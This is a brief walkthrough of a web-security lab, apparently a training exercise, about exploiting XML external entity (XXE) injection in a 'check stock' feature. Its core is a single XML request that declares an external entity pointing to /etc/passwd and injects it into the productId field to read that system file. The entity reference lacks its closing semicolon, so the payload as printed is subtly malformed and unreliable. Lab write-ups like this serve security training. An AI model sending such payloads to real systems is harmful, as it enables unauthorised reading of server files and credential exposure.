Last updated 1 year ago
Was this helpful?
the lab has a "check stock" feature that parses XML input
send this request to repeater
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]> <stockCheck><productId>&example</productId><storeId>1</storeId></stockCheck>
hope you found this walkthrough easy to understand and follow
Greeting From